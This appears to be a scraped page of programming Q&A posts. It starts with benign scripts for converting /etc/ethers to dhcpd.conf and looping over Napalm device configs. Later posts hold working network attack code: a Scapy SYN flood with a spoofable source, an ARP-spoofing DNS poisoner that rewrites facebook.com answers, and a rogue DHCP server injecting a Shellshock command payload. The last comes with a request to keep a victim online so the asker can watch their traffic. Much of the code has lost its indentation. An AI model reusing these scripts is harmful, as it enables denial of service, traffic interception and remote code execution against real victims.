Convert /etc/ethers to /etc/dhcpd.conf - linux

I needed to convert a dnsmasq-based DHCP server configuration to ISC dhcpd, so I had to transfer a large number of fixed IP addresses to the new format.
The input format is:
84:2b:2b:19:05:a7 192.168.14.6
00:50:56:00:00:07 192.168.14.7
...
The output needs to be something like:
host myhost1 {
hardware ethernet 84:2b:2b:19:05:a7
fixed address 192.168.14.6
}
Hostname should be resolved through reverse DNS query.

Here is the sample python script (code is longer for the purpose of clarity):
import socket
import re
import sys
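# Patterns for the two whitespace-separated columns of an /etc/ethers line.
MAC_RE = re.compile(r'^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$')
IP_RE = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$')
# Anything outside this set is replaced before a name is written to the config.
UNSAFE_HOST_CHARS = re.compile(r'[^A-Za-z0-9._-]')


def parse_ethers_line(line):
    """Return (mac, ip) for a well-formed "MAC IP" line, otherwise None.

    The MAC is normalised to colon separators, which is the form dhcpd
    expects after "hardware ethernet". Dotted quads with an octet above
    255 are rejected.
    """
    values = line.split()
    if len(values) < 2:
        return None
    mac, ip = values[0], values[1]
    if not MAC_RE.match(mac) or not IP_RE.match(ip):
        return None
    if any(int(octet) > 255 for octet in ip.split('.')):
        return None
    return mac.replace('-', ':'), ip


def fallback_hostname(ip):
    """Return a placeholder label such as host_192_168_14_6 for *ip*."""
    # str.replace takes a literal string, not a regex, so the dot is
    # matched as "." (an escaped "\\." would never match anything).
    return "host_" + ip.replace(".", "_")


def safe_host_label(name):
    """Replace every character that is not a letter, digit, '.', '_' or '-'.

    The name comes from a PTR record, i.e. from whoever controls the reverse
    zone, and is written into dhcpd.conf; braces, semicolons or whitespace
    in it would change the structure of the generated file.
    """
    return UNSAFE_HOST_CHARS.sub('_', name)


def resolve_hostname(ip):
    """Return the reverse-DNS name for *ip*, or a placeholder if lookup fails."""
    try:
        name = socket.gethostbyaddr(ip)[0]
    except (socket.error, UnicodeError):
        # herror/gaierror are subclasses of socket.error.
        return fallback_hostname(ip)
    return safe_host_label(name) or fallback_hostname(ip)


def format_host_block(hostname, mac, ip):
    """Return one ISC dhcpd "host" declaration as a string.

    dhcpd statements end with ';' and the keyword is "fixed-address"
    (hyphenated).
    """
    return "\n".join([
        "host " + hostname + " {",
        "  hardware ethernet " + mac + ";",
        "  fixed-address " + ip + ";",
        "}",
    ])


def convert_ethers(path):
    """Print a dhcpd host declaration for every valid line of the file at *path*."""
    # The context manager closes the file even if a lookup or print fails.
    with open(path, 'r') as ethers_file:
        for line in ethers_file:
            parsed = parse_ethers_line(line)
            if parsed is None:
                continue  # blank, comment or malformed line
            mac, ip = parsed
            # Single-argument print() behaves the same on Python 2 and 3.
            print(format_host_block(resolve_hostname(ip), mac, ip))


if __name__ == "__main__":
    convert_ethers(sys.argv[1])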

Related

Use for loop with dictionary

I'm using Napalm to change the hostname of many network devices. Since the config will be different for each device, I need the script to assign the proper config to each device based on its IP address. This seems like a dictionary would work best.
# Management IP of each device mapped to the config file meant for it.
devicelist = {
    '10.255.32.1': 'device1.cfg',
    '10.255.32.5': 'device2.cfg',
}
I need help calling the key value in the script below for each IP address. I have highlighted the line of code where this is required.
from napalm import get_network_driver
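import getpass

# Management IP -> candidate config file to merge onto that device.
devicelist = {
    '10.255.32.1': 'device1.cfg',
    '10.255.32.5': 'device2.cfg',
}

# Credentials are asked for at run time rather than stored in the script,
# so they do not end up in version control or shell history.
username = input("Username: ")
password = getpass.getpass("Password: ")

# The driver class is the same for every device, so look it up once.
driver = get_network_driver('ios')

for ip_address, config_file in devicelist.items():
    print("Connecting to " + str(ip_address))
    iosv = driver(ip_address, username, password)
    iosv.open()
    try:
        # The line the question highlights: each device loads its own file.
        iosv.load_merge_candidate(filename=config_file)
        diffs = iosv.compare_config()
        if len(diffs) > 0:
            print(diffs)
            iosv.commit_config()
        else:
            print('No changes required.')
            iosv.discard_config()
    finally:
        # Close the session even when loading or committing raises.
        iosv.close()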
You are asking for a simple access by key on your dictionary, combined with a for loop over the dictionary which is automatically a for loop over the keys. Minimal example:
# Management IP of each device mapped to its config file name.
devicelist = {
    '10.255.32.1': 'device1.cfg',
    '10.255.32.5': 'device2.cfg',
}

# Iterating a dict yields its keys; the value is fetched by key lookup.
for ip_address in devicelist:
    config_name = devicelist[ip_address]
    print("This IP : {} maps to this name: {}".format(ip_address, config_name))
Output:
This IP : 10.255.32.1 maps to this name: device1.cfg
This IP : 10.255.32.5 maps to this name: device2.cfg

Forwarding packets to windows

I wrote some code to send packets from my Kali Linux machine to my Windows PC, but the packets don't show up in Wireshark. The code runs without errors and sends the packets, but they are not received.
Can anyone help?
#!/usr/bin/python
from scapy.all import *
# Emits one TCP packet from `src` to `tgt` for every destination port in
# range(1024, 65535), i.e. ports 1024..65534, always from source port 4444.
# TCP() is given no flags, so Scapy's default (SYN) applies.
# Detection view: SYN-only packets from one fixed source port walking
# sequential destination ports is a pattern IDS scan/flood rules key on.
def synflood(src,tgt,message):
for dport in range(1024,65535):
# `src` is whatever the caller passes, so the source address in the packet
# is not necessarily the sender's own.
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=4444, dport=dport)
# Built from `message` but not stacked onto the packet assembled below.
RAWlayer = Raw(load=message)
pkt = IPlayer/TCPlayer
# send() transmits at layer 3; Scapy chooses the route and link-layer framing.
send(pkt)
# Read source address, destination address and payload text from the prompt.
# NOTE(review): the shebang is /usr/bin/python; if that resolves to Python 2,
# input() evaluates what is typed as an expression - confirm the interpreter.
source = input("src: ")
target = input("targert : ")
message = input(" load : ")
# Repeat the whole port sweep until the process is interrupted.
while True:
synflood(source,target,message)
Update: So I fixed the problem! I tried replacing the for statement with "dport = 80", and for the target IP I chose a destination IP other than my PC, and it showed up in Wireshark. That's how I realised that I should configure an internal VM network instead of the bridged one, and it worked.

Scapy - How to forward packets after using arpspoof?

I want to poison dns cache of a machine. First I used arpspoof -i wlan0 -t target_ip -r gateway_ip
I know I could forward the traffic using sysctl -w net.ipv4.ip_forward=1, but then I wouldn't be able to modify dns packets since they are already forwarded.
I need to forward packets using Scapy. By only changing MAC addresses of the packets like in the code below, the forwarding doesn't work.
What I want is to achieve what sysctl -w net.ipv4.ip_forward=1 does, after poisoning DNS cache of the target.
I tried this:
from scapy.all import *
# Link-layer and IP addresses of the gateway, the target and the local host.
# The MAC values are redacted placeholders in the post.
gateway_mac = "x:x:x:x:x:x"
target_ip = "192.168.43.97"
target_mac = "x:x:x:x:x:x"
# Same address that poisonDNS writes into matching A records.
local_ip = "192.168.43.132"
local_mac = "x:x:x:x:x:x"
# Inspects a packet that carries DNS answer records and overwrites the rdata
# of A records whose name contains 'facebook.com' with 192.168.43.132.
# Mitigation view: answers altered on-path like this fail DNSSEC validation
# for signed zones, and are out of reach when the client resolves over
# DoT/DoH.
def poisonDNS(packet):
if packet.haslayer(DNS):
if packet.haslayer(DNSRR):
# qname and dns_id are read here but not used further down.
qname = packet[DNS].qd.qname.decode('utf-8')
ancount = packet[DNS].ancount
dns_id = packet[DNS].id
rr = packet.getlayer(DNSRR)
# Walk the answer section, one record per index.
for i in range(ancount):
rrname = rr[i].rrname.decode('utf-8')
# The type is taken from `rr` itself rather than from rr[i].
rrtype = rr.get_field('type').i2repr(rr, rr.type)
rrdata = rr[i].rdata
if type(rrdata) == bytes:
rrdata = rrdata.decode("utf-8")
if 'facebook.com' in rrname and rrtype == 'A':
print("Poisoning target's DNS cache")
# The packet object is modified in place; nothing is returned.
packet[DNS].an[i].rdata = '192.168.43.132'
packet.show()
print("Successfully poisoned target's DNS cache")
# Rewrites the Ethernet source/destination of frames addressed to the local
# MAC so they continue towards the gateway or the target, then emits the
# frame with sendp() (layer 2).
# NOTE(review): indentation was lost in this listing, so whether sendp() runs
# for every frame or only inside one of the branches cannot be told from here.
# Mitigation view: the ARP redirection this depends on is what switch-side
# Dynamic ARP Inspection or static ARP entries are meant to prevent.
def forwardPacket(packet):
if packet.haslayer(Ether):
src_mac = packet[Ether].src
dst_mac = packet[Ether].dst
# Configured MACs are lower-cased before being compared with the frame's.
if src_mac == target_mac.lower() and dst_mac == local_mac.lower():
# Target --> Local ==> Local --> Gateway
packet[Ether].src = local_mac.lower()
packet[Ether].dst = gateway_mac.lower()
elif src_mac == gateway_mac.lower() and dst_mac == local_mac.lower():
# Gateway --> Local ==> Local --> Target
packet[Ether].src = local_mac.lower()
packet[Ether].dst = target_mac.lower()
sendp(packet)
# Callback handed to sniff(); for each captured packet it calls poisonDNS()
# and then forwardPacket(packet), in that order.
def packet_callback(packet):
# Poison DNS
poisonDNS()
# Forward packets
forwardPacket(packet)
# No iface or filter is given, so Scapy's defaults apply; store=0 keeps
# captured packets from accumulating in memory.
sniff(prn=packet_callback, store=0)
This doesn't work. The requests don't go through.
What am I doing wrong? How can I forward the traffic in Scapy?

Multiple inputs and lines loop to write to file - python

Currently I'm pasting multiple lines of names which loops through each line and writes into a file. This prompts me to paste values in which works.
However I would like to have another prompt for other values like IPs etc going through the same loop.
Probably something very simple but any help would be appreciated.
Thanks in advance.
# Prompt once for the subnet mask that every entry will share.
subnet = input(('Paste the subnet mask: '))
# Sentinel for iter(): an empty line ends the loop. (The name also shadows
# the interactive `quit` builtin.)
quit = ''
# iter(input, quit) calls input() repeatedly and stops at the first empty line.
for line in iter(input, quit):
# The file is reopened in append mode on every iteration.
with open('my_file.yml', 'a') as data_file:
# `ips` is not assigned anywhere in this snippet - it is the second value the
# question asks how to prompt for. Values are written exactly as typed, with
# no YAML quoting.
data_file.write(" - host: " + line + "\n ip: " + ips + "\n subnet:
" + subnet)
You can do what you want without iter by using an infinite while that only breaks out when no input is entered. I could have also checked for no input with if not host, because empty strings return False (See: Truth Value Testing).
The file is only opened once. There is no need to repeatedly open it on each iteration.
I have used an f-string with the call to write(), but you can still use normal strings like you did.
# The mask is asked for once and reused for every entry.
subnet = input('Paste the subnet mask: ')

# One open() for the whole session; entries are appended as they are typed.
with open('my_file.yml', 'a') as out:
    while True:
        host = input('Enter host: ')
        if host == '':
            break  # empty host ends the session
        ips = input('Enter IPs: ')
        if ips == '':
            break  # empty IP ends the session without writing this host
        # Values go into the file exactly as typed: no quoting or validation,
        # so YAML-special characters in the input change the document.
        entry = f' - host: {host}\n ip: {ips}\n subnet: {subnet}\n'
        out.write(entry)
Contents of my_file.yml:
- host: localhost
ip: 192.168.0.5
subnet: 255.255.255.0
- host: anotherhost
ip: 192.168.1.1
subnet: 255.255.255.0

continue net connection of victim after DHCP spoofing attack

I'm performing a dhcp spoofing attack. First I run a dhcp starvation attack which depletes the ip pool of my router. Then I execute the dhcp spoofing code which assigns a fake ip to my victim device, when it tries to connect to the wireless router.
My problem is, after my victim device is assigned the fake ip it can no longer access the internet. In a real case scenario, if the victim gets disconnected from the internet, they will know something is wrong, also there's no point to a spoofing attack if I cannot see the victim's activity.
So, how do I connect my victim to the internet with the fake IP? Yes, I know the rogue DHCP server will act as the real server for the victim, but how exactly is the implementation supposed to work, since in my case the rogue DHCP server is my PC and not a router?
Here is the dhcp spoofing code taken from github.
#! /usr/bin/env python
#Based on the PoC from https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
import binascii
import argparse
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
# Command line: -i/--iface (required) names the interface used for sniffing
# and sending; -c/--cmd supplies the string that dhcp_ack appends to its
# option-114 value.
parser = argparse.ArgumentParser(description='DHCPSock', epilog='Shock dem shells!')
parser.add_argument('-i', '--iface', type=str, required=True, help='Interface to use')
parser.add_argument('-c', '--cmd', type=str, help='Command to execute [default: "echo pwned"]')
args = parser.parse_args()
# Default used when -c is absent or empty.
command = args.cmd or "echo 'pwned'"
# Exit unless running with effective UID 0. os and sys are not imported by
# name in this listing - presumably they arrive via `from scapy.all import *`.
if os.geteuid() != 0:
sys.exit("Run me as r00t")
#BOOTP
#siaddr = DHCP server ip
#yiaddr = ip offered to client
#xid = transaction id
#chaddr = clients mac address in binary format
# Builds (does not send) a broadcast DHCP OFFER that echoes the client's
# hardware address and transaction id.
#   raw_mac: client MAC as raw bytes, placed in BOOTP chaddr
#   xid:     transaction id copied from the client's message
# Returns the assembled Scapy packet.
# Mitigation view: DHCP snooping on access switches drops server-type
# messages (OFFER/ACK) that arrive on untrusted ports.
def dhcp_offer(raw_mac, xid):
print "in dhcp_offer"
# Ethernet broadcast from the chosen interface's own MAC; UDP 67 -> 68.
packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
IP(src="192.168.0.105", dst='255.255.255.255') /
UDP(sport=67, dport=68) /
# yiaddr is the address offered to the client, siaddr the server address.
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
# 192.168.0.105 is announced as both DHCP server and default router.
# Lease, renewal and rebinding times are in seconds.
DHCP(options=[("message-type", "offer"),
('server_id', '192.168.0.105'),
('subnet_mask', '255.255.255.0'),
('router', '192.168.0.105'),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
"end"]))
#print packet.show()
return packet
# Builds (does not send) a broadcast DHCP ACK with the same addressing and
# lease options as dhcp_offer, plus option 114.
#   raw_mac: client MAC as raw bytes, placed in BOOTP chaddr
#   xid:     transaction id copied from the client's message
#   command: string appended to the option-114 value
# Returns the assembled Scapy packet.
def dhcp_ack(raw_mac, xid, command):
print "in dhcp_ack"
packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') /
IP(src="192.168.0.105", dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.1.4', siaddr='192.168.0.105', xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', '192.168.0.105'),
('subnet_mask', '255.255.255.0'),
('router', '192.168.0.105'),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
# Option 114 carries the "() { ...;}; " function-definition prefix from the
# Shellshock DHCP PoC referenced in the header comment, followed by `command`.
# Defender view: a bash patched for Shellshock does not run the trailing text,
# and a DHCP option value beginning with "() {" is a usable detection string.
(114, "() { ignored;}; " + command),
"end"]))
#print packet.show()
return packet
# Sniff callback: answers a client's DISCOVER with dhcp_offer() and its
# REQUEST with dhcp_ack(), sending each reply on args.iface.
#   resp: the captured packet
def dhcp(resp):
if resp.haslayer(DHCP):
mac_addr = resp[Ether].src
# "aa:bb:..." text form -> 6 raw bytes for the BOOTP chaddr field.
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
# assumes options[0] is the message-type option - TODO confirm.
# Value 1 is treated as DISCOVER.
if resp[DHCP].options[0][1] == 1:
xid = resp[BOOTP].xid
print "[*] Got dhcp DISCOVER from: " + mac_addr + " xid: " + hex(xid)
print "[*] Sending OFFER..."
packet = dhcp_offer(raw_mac, xid)
#packet.plot(lambda x:len(x))
#packet.pdfdump("test.pdf")
#print hexdump(packet)
#print packet.show()
sendp(packet, iface=args.iface)
# Value 3 is treated as REQUEST.
if resp[DHCP].options[0][1] == 3:
xid = resp[BOOTP].xid
print "[*] Got dhcp REQUEST from: " + mac_addr + " xid: " + hex(xid)
print "[*] Sending ACK..."
packet = dhcp_ack(raw_mac, xid, command)
#print hexdump(packet)
#print packet.show()
sendp(packet, iface=args.iface)
print "[*] Waiting for a DISCOVER..."
# Capture only UDP traffic on ports 67/68 on the chosen interface and hand
# every matching packet to dhcp().
sniff(filter="udp and (port 67 or 68)", prn=dhcp, iface=args.iface)
#sniff(filter="udp and (port 67 or 68)", prn=dhcp)
